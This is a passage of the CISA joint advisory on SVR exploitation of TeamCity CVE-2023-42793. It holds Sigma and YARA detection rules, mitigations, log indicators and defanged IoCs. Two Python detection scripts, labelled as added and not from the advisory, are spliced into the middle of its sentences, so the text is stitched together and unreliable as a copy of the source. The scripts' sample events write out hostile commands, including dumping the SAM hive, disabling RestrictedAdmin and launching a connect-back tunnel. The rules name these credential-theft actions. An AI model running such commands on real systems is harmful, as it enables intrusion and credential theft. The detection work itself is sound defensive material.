names\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: taskscheduler\r\n  product: windows\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 16 of 25\n\ndetection:\r\nselection:\r\n    EventID:\r\n     - 4698\r\n     - 4699\r\n     - 4702\r\n    TaskName:\r\n     - '\\Microsoft\\Windows\\IISUpdateService'\r\n  
   - '\\Microsoft\\Windows\\WindowsDefenderService'\r\n     - '\\Microsoft\\Windows\\WindowsDefenderService2'\r\n     - '\\Microsoft\\DefenderService'\r\n     - '\\Microsoft\\Windows\\DefenderUPDService'\r\n     - '\\Microsoft\\Windows\\WiMSDFS'\r\n     - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\r\n     - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\r\n     - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\r\n     - '\\WindowUpdate'\r\n     - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\r\n     - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\r\n     - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\r\n     - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\r\n     - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\r\n     - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\r\n     - '\\Microsoft\\Windows\\ATPUpd'\r\n     - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\r\n     - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\r\n     - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\r\n     - '\\Defender'\r\n     - '\\defender'\r\n     - '\\\\Microsoft\\\\Windows\\\\IISUpdateService'\r\n     - '\\\\Microsoft\\\\Windows\\\\WindowsDefenderService'\r\n     - '\\\\Microsoft\\\\Windows\\\\WindowsDefenderService2'\r\n     - '\\\\Microsoft\\\\DefenderService'\r\n     - '\\\\Microsoft\\\\Windows\\\\DefenderUPDService'\r\n     - '\\\\Microsoft\\\\Windows\\\\WiMSDFS'\r\n     - '\\\\Microsoft\\\\Windows\\\\Application Experience\\\\StartupAppTaskCkeck'\r\n     - '\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\SubmitReporting'\r\n     - '\\\\Microsoft\\\\Windows\\\\Windows Defender\\\\Defender Update Service'\r\n     - '\\\\WindowUpdate'\r\n     - '\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\CheckReporting'\r\n     - '\\\\Microsoft\\\\Windows\\\\Application 
Experience\\\\StartupAppTaskCheck'\r\n     - '\\\\Microsoft\\\\Windows\\\\Speech\\\\SpeechModelInstallTask'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 17 of 25\n\n- '\\\\Microsoft\\\\Windows\\\\Windows Filtering Platform\\\\BfeOnServiceStart'\r\n- '\\\\Microsoft\\\\Windows\\\\Data Integrity Scan\\Data Integrity Update'\r\n     - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled AutoCheck'\r\n     - '\\\\Microsoft\\\\Windows\\\\ATPUpd'\r\n     - '\\\\Microsoft\\\\Windows\\\\Windows Defender\\\\Service Update'\r\n     - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled Check'\r\n     - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled AutoCheck'\r\n     - '\\\\Defender'\r\n     - '\\\\defender'\r\n  condition: selection\r\ntitle: Scheduled tasks names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific scheduled task names\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    Image|endswith:\r\n     - 'schtasks.exe'\r\n    CommandLine|contains:\r\n     - 'IISUpdateService'\r\n     - 'WindowsDefenderService'\r\n     - 'WindowsDefenderService2'\r\n     - 'DefenderService'\r\n     - 'DefenderUPDService'\r\n     - 'WiMSDFS'\r\n     - 'StartupAppTaskCkeck'\r\n     - 'SubmitReporting'\r\n     - 'Defender Update Service'\r\n     - 'WindowUpdate'\r\n     - 'CheckReporting'\r\n     - 'StartupAppTaskCheck'\r\n     - 'SpeechModelInstallTask'\r\n     - 'BfeOnServiceStart'\r\n     - 'Data Integrity Update'\r\n     - 'Scheduled AutoCheck'\r\n     - 'ATPUpd'\r\n     - 'Service Update'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 18 of 25\n\n- 'Scheduled Check'\r\n- 'Scheduled AutoCheck'\r\n     - 'Defender'\r\n     - 'defender'\r\n  selection_re:\r\n    Image|endswith:\r\n     - 'schtasks.exe'\r\n    CommandLine|re:\r\n     - '.*Defender\\sUpdate\\sService.*'\r\n     
- '.*Data\\sIntegrity\\sUpdate.*'\r\n     - '.*Scheduled\\sAutoCheck.*'\r\n     - '.*Service\\sUpdate.*'\r\n     - '.*Scheduled\\sCheck.*'\r\n     - '.*Scheduled\\sAutoCheck.*'\r\n  condition: selection or selection_re\r\ntitle: Suspicious registry modifications\r\ndescription: Suspicious registry modifications\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: registry_set\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    EventID: 4657\r\n    TargetObject|contains:\r\n     - 'CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin'\r\n     - 'CurrentControlSet\\\\Control\\\\Lsa\\\\NoLMHash'\r\n  condition: selection\r\ntitle: Registry modification from cmd\r\ndescription: Registry modification from cmd\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 19 of 25\n\nImage|endswith:\r\n- 'reg.exe'\r\n    CommandLine|contains|all:\r\n     - 'CurrentControlSet'\r\n     - 'Lsa'\r\n    CommandLine|contains:\r\n     - 'DisableRestrictedAdmin'\r\n     - 'NoLMHash'\r\n  condition: selection\r\ntitle: Malicious Driver Load\r\ndescription: Detects the load of known malicious drivers via their names or hash.\r\nreferences:\r\n  - https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: driver_load\r\n  product: windows\r\ndetection:\r\n  selection_name:\r\n    ImageLoaded|endswith:\r\n      - 'RTCore64.sys'\r\n      - 'DBUtils_2_3.sys'\r\n  selection_hash:\r\n    Hashes|contains:\r\n      - '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'\r\n      - '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'\r\n  condition: selection_name or selection_hash\r\nYARA rules\r\nThe following rule detects most known GraphicalProton variants.\r\nrule 
APT29_GraphicalProton {\r\n  strings:\r\n    // C1 E9 1B                shr   ecx, 1Bh\r\n    // 48 8B 44 24 08             mov   rax, [rsp+30h+var_28]\r\n    // 8B 50 04                mov   edx, [rax+4]\r\n    // C1 E2 05                shl   edx, 5\r\n    // 09 D1                  or   ecx, edx\r\n    // 48 8B 44 24 08             mov   rax, [rsp+30h+var_28]\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 20 of 25\n\n$op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 |\r\n0d | 07) 09 ?? 48 }\r\n    // 48 05 20 00 00 00            add   rax, 20h ; ' '\r\n    // 48 89 C1                mov   rcx, rax\r\n    // 48 8D 15 0A A6 0D 00          lea   rdx, unk_14011E546\r\n    // 41 B8 30 00 00 00            mov   r8d, 30h ; '0'\r\n    // E8 69 B5 FE FF             call  sub_14002F4B0\r\n    // 48 8B 44 24 30             mov   rax, [rsp+88h+var_58]\r\n    // 48 05 40 00 00 00            add   rax, 40h ; '@'\r\n    // 48 89 C1                mov   rcx, rax\r\n    // 48 8D 15 1B A6 0D 00          lea   rdx, unk_14011E577\r\n    // 41 B8 70 01 00 00            mov   r8d, 170h\r\n    // E8 49 B5 FE FF             call  sub_14002F4B0\r\n    // 48 8B 44 24 30             mov   rax, [rsp+88h+var_58]\r\n    // 48 05 60 00 00 00            add   rax, 60h ; '`'\r\n    // 48 89 C1                mov   rcx, rax\r\n    // 48 8D 15 6C A7 0D 00          lea   rdx, unk_14011E6E8\r\n    // 41 B8 2F 00 00 00            mov   r8d, 2Fh ; '/'\r\n    // E8 29 B5 FE FF             call  sub_14002F4B0\r\n    // 48 8B 44 24 30             mov   rax, [rsp+88h+var_58]\r\n    // 48 05 80 00 00 00            add   rax, 80h\r\n    // 48 89 C1                mov   rcx, rax\r\n    // 48 8D 15 7C A7 0D 00          lea   rdx, unk_14011E718\r\n    // 41 B8 2F 00 00 00            mov   r8d, 2Fh ; '/'\r\n    // E8 09 B5 FE FF             call  sub_14002F4B0\r\n    // 48 8B 44 24 30             mov   rax, [rsp+88h+var_58]\r\n    // 48 05 
A0 00 00 00            add   rax, 0A0h\r\n    $op_decrypt_config = {\r\n      48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n      48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n      48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n      48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n      48 05 A0 00 00 00\r\n    }\r\n  condition:\r\n    all of them\r\n}\r\nNote: These rules are meant for threat hunting and have not been tested on a larger dataset.\r\nMITIGATIONS\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 21 of 25\n\nThe FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this\r\ncampaign poses a threat to public safety and recommend organizations implement the mitigations below to\r\nimprove organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity\r\nPerformance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).\r\nThe CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations\r\nimplement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against\r\nthe most common and impactful threats, tactics, techniques, and procedures. 
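The Sigma rules in the Detection Methods section above are written for a Sigma backend, which hides how the modifiers actually combine and makes them hard to sanity-check without one. The following Python is an added example, not code from the advisory or from the authoring agencies: it transcribes six of the process_creation rules into plain dicts, evaluates them with Sigma's matching semantics (list values OR-ed, |all AND-ed, fields within a selection AND-ed, string modifiers case-insensitive, |re case-sensitive), and runs them over constructed Sysmon-style events. The events, file paths, IP address and password in EVENTS are invented sample data, not indicators from this report.

```python
import re

# Sigma process_creation rules transcribed from the Detection Methods section
# of this advisory into plain dicts. Keys are Sigma "Field|modifier" strings;
# list values are OR-ed unless the |all modifier is present; fields inside one
# selection are AND-ed, as in Sigma.
RULES = {
    'Privilege information listing via whoami': {
        'selection': {'Image|endswith': ['whoami.exe'],
                      'CommandLine|contains': ['priv', 'PRIV']},
        'condition': 'selection'},
    'DC listing via nltest': {
        'selection': {'Image|endswith': ['nltest.exe'],
                      'CommandLine|re': r'.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'},
        'condition': 'selection'},
    'DLL execution via WMI': {
        'selection': {'Image|endswith': ['WMIC.exe'],
                      'CommandLine|contains|all': ['call', 'rundll32']},
        'condition': 'selection'},
    'Process with connect and pass as args': {
        'selection': {'CommandLine|contains|all': ['pass', 'connect']},
        'condition': 'selection'},
    'Sensitive registry entries saved to file': {
        'selection_base': {'Image|endswith': ['reg.exe'],
                           'CommandLine|contains': ['save'],
                           'CommandLine|re': r'.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'},
        'selection_file': {'CommandLine|re': r'.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'},
        'condition': 'selection_base and selection_file'},
    'Registry modification from cmd': {
        'selection': {'Image|endswith': ['reg.exe'],
                      'CommandLine|contains|all': ['CurrentControlSet', 'Lsa'],
                      'CommandLine|contains': ['DisableRestrictedAdmin', 'NoLMHash']},
        'condition': 'selection'},
}

def _field_matches(event, key, values):
    # Sigma string modifiers are case-insensitive; |re is not. The original
    # rules list 'priv' and 'PRIV' separately, which a spec-compliant backend
    # does not need, but keeping both is harmless.
    field, *mods = key.split('|')
    actual = str(event.get(field, ''))
    if isinstance(values, str):
        values = [values]
    if 're' in mods:
        hits = [re.search(v, actual) is not None for v in values]
    elif 'endswith' in mods:
        hits = [actual.lower().endswith(v.lower()) for v in values]
    elif 'contains' in mods:
        hits = [v.lower() in actual.lower() for v in values]
    else:
        hits = [actual.lower() == v.lower() for v in values]
    return all(hits) if 'all' in mods else any(hits)

def rule_matches(event, rule):
    sels = {name: all(_field_matches(event, k, v) for k, v in sel.items())
            for name, sel in rule.items() if name != 'condition'}
    # The conditions on this page are a single selection name or two names
    # joined by one 'and'/'or', so left-to-right evaluation is sufficient.
    tokens = rule['condition'].split()
    result = sels[tokens[0]]
    for op, name in zip(tokens[1::2], tokens[2::2]):
        result = (result and sels[name]) if op == 'and' else (result or sels[name])
    return result

def scan(events, rules=RULES):
    """Return {rule title: [matching command lines]} for every rule that fired."""
    hits = {}
    for ev in events:
        for title, rule in rules.items():
            if rule_matches(ev, rule):
                hits.setdefault(title, []).append(ev['CommandLine'])
    return hits

# Constructed process-creation events (not from the advisory): six that mirror
# the behaviours the rules describe, plus two benign look-alikes that must not fire.
EVENTS = [
    {'Image': 'C:\\Windows\\System32\\whoami.exe', 'CommandLine': 'whoami /priv'},
    {'Image': 'C:\\Windows\\System32\\nltest.exe', 'CommandLine': 'nltest /dclist:corp.example'},
    {'Image': 'C:\\Windows\\System32\\wbem\\WMIC.exe',
     'CommandLine': 'wmic /node:10.0.0.5 process call create rundll32 C:\\Windows\\Temp\\a.dll,Start'},
    {'Image': 'C:\\Windows\\Temp\\rr.exe',
     'CommandLine': 'rr.exe -connect 203.0.113.10:443 -pass example-password'},
    {'Image': 'C:\\Windows\\System32\\reg.exe', 'CommandLine': 'reg save HKLM\\SAM C:\\Windows\\Temp\\sam.sa'},
    {'Image': 'C:\\Windows\\System32\\reg.exe',
     'CommandLine': 'reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'},
    {'Image': 'C:\\Windows\\System32\\whoami.exe', 'CommandLine': 'whoami /groups'},
    {'Image': 'C:\\Windows\\System32\\reg.exe', 'CommandLine': 'reg query HKLM\\SOFTWARE\\Microsoft'},
]

if __name__ == '__main__':
    for title, cmds in scan(EVENTS).items():
        print(title, '->', cmds)
```

Running it fires each of the six rules exactly once and leaves the two benign events alone. One caveat the run makes visible: the reg.exe rule only fires when the output file matches the *.sa names seen in this campaign, so a `reg save HKLM\SAM` to any other filename passes through silently; pair it with a broader hive-dump rule if coverage beyond this tooling is wanted.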
Visit CISA’s Cross-Sector\r\nCybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline\r\nprotections.\r\nApply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if\r\nnot already completed.\r\nMonitor the network for evidence of encoded commands and execution of network scanning tools.\r\nEnsure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring\r\nor reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of\r\ntime.\r\nRequire use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly\r\nfor email, virtual private networks, and accounts that access critical systems.\r\nOrganizations should adopt multi-factor authentication (MFA) as an additional layer of security for\r\nall users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized\r\naccess, even if passwords are compromised.\r\nKeep all operating systems, software, and firmware up to date. 
Immediately configure newly-added\r\nsystems to the network, including those used for testing or development work, to follow the organization’s\r\nsecurity baseline and incorporate into enterprise monitoring tools.\r\nAudit log files to identify attempts to access privileged certificates and creation of fake identity providers.\r\nDeploy software to identify suspicious behavior on systems.\r\nDeploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\r\nUse available public resources to identify credential abuse with cloud environments.\r\nConfigure authentication mechanisms to confirm certain user activities on systems, including registering\r\nnew devices.\r\nVALIDATE SECURITY CONTROLS\r\nIn addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising,\r\ntesting, and validating your organization's security program against the threat behaviors mapped to the MITRE\r\nATT\u0026CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC\r\nrecommend testing your existing security controls inventory to assess how they perform against the ATT\u0026CK\r\ntechniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see previous tables).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 22 of 25\n\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. 
Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nFBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale,\r\nin a production environment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in\r\nthis advisory.\r\nREFERENCES\r\nFBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber\r\nOperations: Trends and Best Practices for Network Defenders\r\nNSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks\r\nCISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise\r\nCISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments\r\nCISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical\r\nInfrastructure, and Private Sector Organizations\r\nCISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity\r\nFBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks\r\nCISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development\r\nNCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development\r\nThe information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW,\r\nCERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any\r\nentities, products, or services linked within this document. 
Any reference to specific commercial entities, products,\r\nprocesses, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply\r\nendorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.\r\nVERSION HISTORY\r\nDecember 12, 2023: Initial version.\r\nAPPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793\r\nOn a Windows system, the log file C:\\TeamCity\\logs\\teamcity-server.log will contain a log message when an\r\nattacker modified the internal.properties file. There will also be a log message for every process created via\r\nthe /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user\r\naccount whose authentication token was used during the attack is also shown. For example:\r\n[2023-09-26 11:53:46,970]  INFO - ntrollers.FileBrowseController - File edited:\r\nC:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties by user with id=1\r\n[2023-09-26 11:53:46,970]  INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File\r\nC:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties was modified by \"user with id=1\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 23 of 25\n\n[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by\r\nuser user with id=1. Command line: cmd.exe \"/c whoami\"\r\nAn attacker may attempt to cover their tracks by wiping this log file. 
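As an added example, not code from the advisory or its authors, the following Python turns the log indicators in this appendix into a triage script: it parses the two teamcity-server.log messages quoted above and classifies requests seen at a reverse proxy against the three REST endpoints listed in this appendix. The sample lines are constructed; the proxy lines assume the common/combined access-log format, which is an assumption about the reader's proxy, and their client IPs, timestamps and HTTP methods are sample values only (matching is on the request path alone). The user id is matched as any integer because the appendix notes it may be higher than 1.

```python
import re

# The two teamcity-server.log messages described in this appendix (controller
# line and audit line for the internal.properties edit, and the process launch).
EDIT_RE = re.compile(r'^\[(?P<ts>[^\]]+)\].*File edited:\s*(?P<path>\S+) by user with id=(?P<uid>\d+)')
AUDIT_RE = re.compile(r'^\[(?P<ts>[^\]]+)\].*server_file_change: File (?P<path>\S+) was modified by "user with id=(?P<uid>\d+)"')
PROC_RE = re.compile(r'^\[(?P<ts>[^\]]+)\].*External process is launched by user .*?id=(?P<uid>\d+)\. Command line: (?P<cmd>.*)$')
# Assumed common/combined access-log request field: "METHOD PATH HTTP/x.y".
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# The endpoint the advisory says is required for exploitation; the id may be > 1.
TOKEN_RE = re.compile(r'/app/rest/users/id:\d+/tokens/RPC2')

def triage_server_log(lines):
    """Pull internal.properties edits and REST-spawned processes out of teamcity-server.log."""
    edits, procs = [], []
    for line in lines:
        m = EDIT_RE.search(line) or AUDIT_RE.search(line)
        if m and m.group('path').lower().endswith('internal.properties'):
            edits.append((m.group('ts'), m.group('uid'), m.group('path')))
            continue
        m = PROC_RE.search(line)
        if m:
            procs.append((m.group('ts'), m.group('uid'), m.group('cmd')))
    return {'edits': edits, 'processes': procs}

def triage_proxy_log(lines):
    """Classify proxy requests against the three endpoints named in this appendix (path only)."""
    hits = {'token': [], 'create_user': [], 'process': []}
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        path = m.group('path').split('?', 1)[0]
        req = m.group('method') + ' ' + m.group('path')
        if TOKEN_RE.fullmatch(path):
            hits['token'].append(req)
        elif path == '/app/rest/users':
            hits['create_user'].append(req)
        elif path == '/app/rest/debug/processes':
            hits['process'].append(req)
    return hits

def assess(server, proxy):
    """Return (compromised, reasons). A token-endpoint hit alone is treated as exploitation,
    since that request is required for it; an empty server log is not treated as clean."""
    reasons = []
    n_token, n_proc = len(proxy['token']), len(server['processes'])
    if n_token:
        reasons.append(f'{n_token} request(s) to the RPC2 token endpoint seen at the proxy')
    if server['edits']:
        uids = sorted({e[1] for e in server['edits']})
        reasons.append(f'internal.properties modified through the REST API by user id(s) {uids}')
    if n_proc:
        reasons.append(f'{n_proc} process(es) launched via /app/rest/debug/processes')
    if not reasons:
        return False, ['no evidence found; an empty or truncated teamcity-server.log is consistent with log wiping']
    return True, reasons

# Constructed sample lines mirroring the messages quoted in this appendix.
SERVER_LOG = [
    '[2023-09-26 11:53:46,970]  INFO - ntrollers.FileBrowseController - File edited: C:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties by user with id=1',
    '[2023-09-26 11:53:46,970]  INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties was modified by "user with id=1"',
    '[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"',
    '[2023-09-26 12:01:03,114] INFO - jetbrains.buildServer.SERVER - Build queue optimized',  # ordinary noise
]
PROXY_LOG = [  # constructed; IPs, times and methods are sample values only
    '203.0.113.7 - - [26/Sep/2023:11:53:21 +0000] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0',
    '203.0.113.7 - - [26/Sep/2023:11:53:22 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 312',
    '203.0.113.7 - - [26/Sep/2023:11:53:40 +0000] "POST /app/rest/users HTTP/1.1" 200 880',
    '203.0.113.7 - - [26/Sep/2023:11:53:58 +0000] "POST /app/rest/debug/processes HTTP/1.1" 200 64',
    '198.51.100.4 - - [26/Sep/2023:12:00:00 +0000] "GET /app/rest/users/id:1 HTTP/1.1" 200 1024',  # benign read
    '198.51.100.4 - - [26/Sep/2023:12:00:05 +0000] "GET /login.html HTTP/1.1" 200 4096',
]

if __name__ == '__main__':
    verdict, why = assess(triage_server_log(SERVER_LOG), triage_proxy_log(PROXY_LOG))
    print('compromised' if verdict else 'no evidence', why)
```

The verdict is deliberately conservative: a single request to the RPC2 token endpoint is enough, and an empty or truncated server log is reported as consistent with wiping rather than as clean, which is the point the paragraph above makes. Paths are compared exactly, so an ordinary `GET /app/rest/users/id:1` from an administrator does not register as a user-creation attempt.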
It does not appear that TeamCity logs\r\nindividual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy , the HTTP proxy may have\r\nsuitable logs showing the following target endpoints being accessed:\r\n/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.\r\n/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.\r\n/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary\r\nprocess.\r\nNote: The user ID value may be higher than 1.\r\nAPPENDIX B – IOCS\r\nFile IoCs\r\nGraphicalProton backdoor:\r\n01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732\r\n34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E\r\n620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869\r\n773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13\r\n7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53\r\n8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7\r\n971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC\r\nCB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF\r\nCD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43\r\nEBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E\r\nF1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB\r\nC7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4\r\n4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166\r\nGraphicalProton HTTPS 
backdoor:\r\n18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93\r\n19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641\r\n1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8\r\n219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67\r\n92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6\r\nB53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7\r\nC37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD\r\nC40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0\r\nC832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 24 of 25\n\nF6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69\r\nBackdoored vcperf:\r\nD724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443\r\nBackdoored Zabbix installation archive:\r\n4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F\r\nBackdoored Webroot AV installation archive:\r\n950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4\r\nModified rsockstun\r\nCB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF\r\nNetwork IoCs\r\nTunnel Endpoints\r\n65.20.97[.]203\r\n65.21.51[.]58\r\nExploitation Server\r\n103.76.128[.]34\r\nGraphicalProton HTTPS C2 URL:\r\nhxxps://matclick[.]com/wp-query[.]php\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a"
	],
	"report_names": [
		"aa23-347a"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
